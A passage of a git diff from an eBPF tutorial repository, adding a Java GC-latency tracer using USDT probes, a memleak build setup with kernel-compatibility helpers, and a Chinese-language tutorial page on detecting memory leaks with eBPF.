-n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + 
$(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/15-javagc/javagc.bpf.c b/15-javagc/javagc.bpf.c new file mode 100644 index 0000000..35535d9 --- /dev/null +++ b/15-javagc/javagc.bpf.c @@ -0,0 +1,81 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#include +#include +#include +#include +#include "javagc.h" + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 100); + __type(key, uint32_t); + __type(value, struct data_t); +} data_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __type(key, int); + __type(value, int); +} perf_map SEC(".maps"); + +__u32 time; + +static int gc_start(struct pt_regs *ctx) +{ + struct data_t data = {}; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&data_map, &data.pid, &data, 0); + return 0; +} + +static int gc_end(struct pt_regs *ctx) +{ + struct data_t data = {}; + struct data_t *p; + __u32 val; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + p = bpf_map_lookup_elem(&data_map, &data.pid); + if (!p) + return 0; + + val = data.ts - p->ts; + if (val > time) { + data.ts = val; + bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); + } + bpf_map_delete_elem(&data_map, &data.pid); + return 0; +} + +SEC("usdt") +int handle_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; diff --git a/15-javagc/javagc.c b/15-javagc/javagc.c new file mode 100644 index 0000000..883ae70 --- /dev/null +++ b/15-javagc/javagc.c @@ -0,0 +1,243 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* + * Copyright (c) 2022 Chen Tao + * Based on ugc from BCC by Sasha Goldshtein + * Create: Wed Jun 29 16:00:19 2022 + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "javagc.skel.h" +#include "javagc.h" + +#define BINARY_PATH_SIZE (256) +#define PERF_BUFFER_PAGES (32) +#define PERF_POLL_TIMEOUT_MS (200) + +static struct env { + pid_t pid; + int time; + bool exiting; + bool verbose; +} env = { + .pid = -1, + .time = 1000, + .exiting = false, + .verbose = false, +}; + +const char *argp_program_version = "javagc 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; + +const char argp_program_doc[] = +"Monitor javagc time cost.\n" +"\n" +"USAGE: javagc [--help] [-p PID] [-t GC time]\n" +"\n" +"EXAMPLES:\n" +"javagc -p 185 # trace PID 185 only\n" +"javagc -p 185 -t 100 # trace PID 185 java gc time beyond 100us\n"; + +static const struct argp_option opts[] = { + { "pid", 'p', "PID", 0, "Trace this PID only" }, + { "time", 't', "TIME", 0, "Java gc time" }, + { "verbose", 'v', NULL, 0, 
"Verbose debug output" }, + { NULL, 'h', NULL, OPTION_HIDDEN, "Show the full help" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + int err = 0; + + switch (key) { + case 'h': + argp_state_help(state, stderr, ARGP_HELP_STD_HELP); + break; + case 'v': + env.verbose = true; + break; + case 'p': + errno = 0; + env.pid = strtol(arg, NULL, 10); + if (errno) { + err = errno; + fprintf(stderr, "invalid PID: %s\n", arg); + argp_usage(state); + } + break; + case 't': + errno = 0; + env.time = strtol(arg, NULL, 10); + if (errno) { + err = errno; + fprintf(stderr, "invalid time: %s\n", arg); + argp_usage(state); + } + break; + default: + return ARGP_ERR_UNKNOWN; + } + return err; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && ! env.verbose) + return 0; + + return vfprintf(stderr, format, args); +} + +static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) +{ + struct data_t *e = (struct data_t *)data; + struct tm *tm = NULL; + char ts[16]; + time_t t; + + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); +} + +static void handle_lost_events(void *ctx, int cpu, __u64 data_sz) +{ + printf("lost data\n"); +} + +static void sig_handler(int sig) +{ + env.exiting = true; +} + +static int get_jvmso_path(char *path) +{ + char mode[16], line[128], buf[64]; + size_t seg_start, seg_end, seg_off; + FILE *f; + int i = 0; + + sprintf(buf, "/proc/%d/maps", env.pid); + f = fopen(buf, "r"); + if (!f) + return -1; + + while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", + &seg_start, &seg_end, mode, &seg_off, line) == 5) { + i = 0; + while (isblank(line[i])) + i++; + if (strstr(line + i, "libjvm.so")) { + break; + } + } + + strcpy(path, line + i); + fclose(f); + + return 0; +} + +int main(int argc, char **argv) +{ + static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, + }; + char binary_path[BINARY_PATH_SIZE] = {0}; + struct javagc_bpf *skel = NULL; + int err; + struct perf_buffer *pb = NULL; + + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + return err; + + /* + * libbpf will auto load the so if it in /usr/lib64 /usr/lib etc, + * but the jvmso not there. 
+ */ + err = get_jvmso_path(binary_path); + if (err) + return err; + + libbpf_set_print(libbpf_print_fn); + + skel = javagc_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; + } + skel->bss->time = env.time * 1000; + + err = javagc_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "mem__pool__gc__begin", NULL); + if (!skel->links.handle_mem_pool_gc_start) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "mem__pool__gc__end", NULL); + if (!skel->links.handle_mem_pool_gc_end) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "gc__begin", NULL); + if (!skel->links.handle_gc_start) { + err = errno; + fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "gc__end", NULL); + if (!skel->links.handle_gc_end) { + err = errno; + fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + signal(SIGINT, sig_handler); + printf("Tracing javagc time... Hit Ctrl-C to end.\n"); + printf("%-8s %-7s %-7s %-7s\n", + "TIME", "CPU", "PID", "GC TIME"); + + pb = perf_buffer__new(bpf_map__fd(skel->maps.perf_map), PERF_BUFFER_PAGES, + handle_event, handle_lost_events, NULL, NULL); + while (!env.exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; + } + /* reset err to return 0 if exiting */ + err = 0; + } + +cleanup: + perf_buffer__free(pb); + javagc_bpf__destroy(skel); + + return err != 0; +} diff --git a/15-javagc/javagc.h b/15-javagc/javagc.h new file mode 100644 index 0000000..878f7db --- /dev/null +++ b/15-javagc/javagc.h @@ -0,0 +1,12 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#ifndef __JAVAGC_H +#define __JAVAGC_H + +struct data_t { + __u32 cpu; + __u32 pid; + __u64 ts; +}; + +#endif /* __JAVAGC_H */ diff --git a/15-javagc/tests/HelloWorld.java b/15-javagc/tests/HelloWorld.java new file mode 100644 index 0000000..bb57053 --- /dev/null +++ b/15-javagc/tests/HelloWorld.java @@ -0,0 +1,15 @@ +public class HelloWorld { + public static void main(String[] args) { + // loop and sleep for 1 second + while (true) { + System.out.println("Hello World!"); + // create an object and let it go out of scope + Object obj = new Object(); + try { + Thread.sleep(1000); + } catch (InterruptedException e) { + e.printStackTrace(); + } + } + } +} diff --git a/15-javagc/tests/Makefile b/15-javagc/tests/Makefile new file mode 100644 index 0000000..8dd6e4f --- /dev/null +++ b/15-javagc/tests/Makefile @@ -0,0 +1,3 @@ +test: + javac HelloWorld.java + java HelloWorld \ No newline at end of file diff --git a/15-tcprtt/index.html b/15-tcprtt/index.html index 88f8301..d259747 100644 --- a/15-tcprtt/index.html +++ b/15-tcprtt/index.html @@ -83,7 +83,7 @@ diff 
--git a/16-memleak/.gitignore b/16-memleak/.gitignore new file mode 100644 index 0000000..3bbbd45 --- /dev/null +++ b/16-memleak/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +memleak diff --git a/16-memleak/Makefile b/16-memleak/Makefile new file mode 100644 index 0000000..84ead7e --- /dev/null +++ b/16-memleak/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = memleak # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/16-memleak/core_fixes.bpf.h b/16-memleak/core_fixes.bpf.h new file mode 100644 index 0000000..552c9fa --- /dev/null +++ b/16-memleak/core_fixes.bpf.h @@ -0,0 +1,169 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2021 Hengqi Chen */ + +#ifndef __CORE_FIXES_BPF_H +#define __CORE_FIXES_BPF_H + +#include +#include + +/** + * commit 2f064a59a1 ("sched: Change task_struct::state") changes + * the name of task_struct::state to task_struct::__state + * see: + * https://github.com/torvalds/linux/commit/2f064a59a1 + */ +struct task_struct___o { + volatile long int state; +} __attribute__((preserve_access_index)); + +struct task_struct___x { + unsigned int __state; +} 
__attribute__((preserve_access_index)); + +static __always_inline __s64 get_task_state(void *task) +{ + struct task_struct___x *t = task; + + if (bpf_core_field_exists(t->__state)) + return BPF_CORE_READ(t, __state); + return BPF_CORE_READ((struct task_struct___o *)task, state); +} + +/** + * commit 309dca309fc3 ("block: store a block_device pointer in struct bio") + * adds a new member bi_bdev which is a pointer to struct block_device + * see: + * https://github.com/torvalds/linux/commit/309dca309fc3 + */ +struct bio___o { + struct gendisk *bi_disk; +} __attribute__((preserve_access_index)); + +struct bio___x { + struct block_device *bi_bdev; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_gendisk(void *bio) +{ + struct bio___x *b = bio; + + if (bpf_core_field_exists(b->bi_bdev)) + return BPF_CORE_READ(b, bi_bdev, bd_disk); + return BPF_CORE_READ((struct bio___o *)bio, bi_disk); +} + +/** + * commit d5869fdc189f ("block: introduce block_rq_error tracepoint") + * adds a new tracepoint block_rq_error and it shares the same arguments + * with tracepoint block_rq_complete. As a result, the kernel BTF now has + * a `struct trace_event_raw_block_rq_completion` instead of + * `struct trace_event_raw_block_rq_complete`. + * see: + * https://github.com/torvalds/linux/commit/d5869fdc189f + */ +struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_block_rq_completion() +{ + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; +} + +/** + * commit d152c682f03c ("block: add an explicit ->disk backpointer to the + * request_queue") and commit f3fa33acca9f ("block: remove the ->rq_disk + * field in struct request") make some changes to `struct request` and + * `struct request_queue`. Now, to get the `struct gendisk *` field in a CO-RE + * way, we need both `struct request` and `struct request_queue`. + * see: + * https://github.com/torvalds/linux/commit/d152c682f03c + * https://github.com/torvalds/linux/commit/f3fa33acca9f + */ +struct request_queue___x { + struct gendisk *disk; +} __attribute__((preserve_access_index)); + +struct request___x { + struct request_queue___x *q; + struct gendisk *rq_disk; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_disk(void *request) +{ + struct request___x *r = request; + + if (bpf_core_field_exists(r->rq_disk)) + return BPF_CORE_READ(r, rq_disk); + return BPF_CORE_READ(r, q, disk); +} + +/** + * commit 6521f8917082("namei: prepare for idmapped mounts") add `struct + * user_namespace *mnt_userns` as vfs_create() and vfs_unlink() first argument. + * At the same time, struct renamedata {} add `struct user_namespace + * *old_mnt_userns` item. Now, to kprobe vfs_create()/vfs_unlink() in a CO-RE + * way, determine whether there is a `old_mnt_userns` field for `struct + * renamedata` to decide which input parameter of the vfs_create() to use as + * `dentry`. 
+ * see: + * https://github.com/torvalds/linux/commit/6521f8917082 + */ +struct renamedata___x { + struct user_namespace *old_mnt_userns; +} __attribute__((preserve_access_index)); + +static __always_inline bool renamedata_has_old_mnt_userns_field(void) +{ + if (bpf_core_field_exists(struct renamedata___x, old_mnt_userns)) + return true; + return false; +} + +/** + * commit 3544de8ee6e4("mm, tracing: record slab name for kmem_cache_free()") + * replaces `trace_event_raw_kmem_free` with `trace_event_raw_kfree` and adds + * `tracepoint_kmem_cache_free` to enhance the information recorded for + * `kmem_cache_free`. + * see: + * https://github.com/torvalds/linux/commit/3544de8ee6e4 + */ + +struct trace_event_raw_kmem_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kfree___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kmem_cache_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_kfree() +{ + if (bpf_core_type_exists(struct trace_event_raw_kfree___x)) + return true; + return false; +} + +static __always_inline bool has_kmem_cache_free() +{ + if (bpf_core_type_exists(struct trace_event_raw_kmem_cache_free___x)) + return true; + return false; +} + +#endif /* __CORE_FIXES_BPF_H */ diff --git a/16-memleak/index.html b/16-memleak/index.html index 7a7323a..f167551 100644 --- a/16-memleak/index.html +++ b/16-memleak/index.html @@ -83,7 +83,7 @@ @@ -144,212 +144,374 @@
-

eBPF 入门实践教程:编写 eBPF 程序 Memleak 监控内存泄漏

-

背景

-

内存泄漏对于一个程序而言是一个很严重的问题。倘若放任一个存在内存泄漏的程序运行,久而久之 -系统的内存会慢慢被耗尽,导致程序运行速度显著下降。为了避免这一情况,memleak工具被提出。 -它可以跟踪并匹配内存分配和释放的请求,并且打印出已经被分配资源而又尚未释放的堆栈信息。

-

实现原理

-

memleak 的实现逻辑非常直观。它在我们常用的动态分配内存的函数接口路径上挂载了ebpf程序, -同时在free上也挂载了ebpf程序。在调用分配内存相关函数时,memleak 会记录调用者的pid,分配得到 -内存的地址,分配得到的内存大小等基本数据。在free之后,memeleak则会去map中删除记录的对应的分配 -信息。对于用户态常用的分配函数 malloc, calloc 等,memleak使用了 uporbe 技术实现挂载,对于 -内核态的函数,比如 kmalloc 等,memleak 则使用了现有的 tracepoint 来实现。

-

编写 eBPF 程序

-
struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, pid_t);
-	__type(value, u64);
-	__uint(max_entries, 10240);
-} sizes SEC(".maps");
+                        

eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏

+

eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。

+

背景及其重要性

+

内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。

+

内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。

+

调试内存泄漏的挑战

+

调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。

+

eBPF 的作用

+

在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。

+

memleak eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,memleak 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令:

+
# ./memleak -p $(pidof allocs)
+Attaching to pid 5193, Ctrl+C to quit.
+[11:16:33] Top 2 stacks with outstanding allocations:
+        80 bytes in 5 allocations from stack
+                 main+0x6d [allocs]
+                 __libc_start_main+0xf0 [libc-2.21.so]
 
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64); /* address */
-	__type(value, struct alloc_info);
-	__uint(max_entries, ALLOCS_MAX_ENTRIES);
-} allocs SEC(".maps");
+[11:16:34] Top 2 stacks with outstanding allocations:
+        160 bytes in 10 allocations from stack
+                 main+0x6d [allocs]
+                 __libc_start_main+0xf0 [libc-2.21.so]
+
+

运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。

+

随着时间的推移,很显然,allocs 进程的 main 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。
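为了方便复现上面的输出,这里给出一个最小的测试程序草图(文件名 allocs.c 与每次 16 字节的泄漏量只是与上述输出对应的示例假设,并非教程自带代码),它在循环中不断分配而从不释放:

// allocs.c:一个故意泄漏内存的示例程序(假设示例,仅用于演示 memleak 的输出)
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    while (1) {
        void *leaked = malloc(16); // 每次循环分配 16 字节
        (void)leaked;              // 故意不调用 free(),制造泄漏
        sleep(1);
    }
    return 0;
}

用 gcc -o allocs allocs.c 编译并运行后,再执行 ./memleak -p $(pidof allocs),即可观察到与上文类似的、随时间不断增长的未释放分配统计。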

+

memleak 的实现原理

+

在基本层面上,memleak 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,memleak 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,memleak 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 memleak 能够准确地追踪到哪些内存块已被分配但未被释放。

+

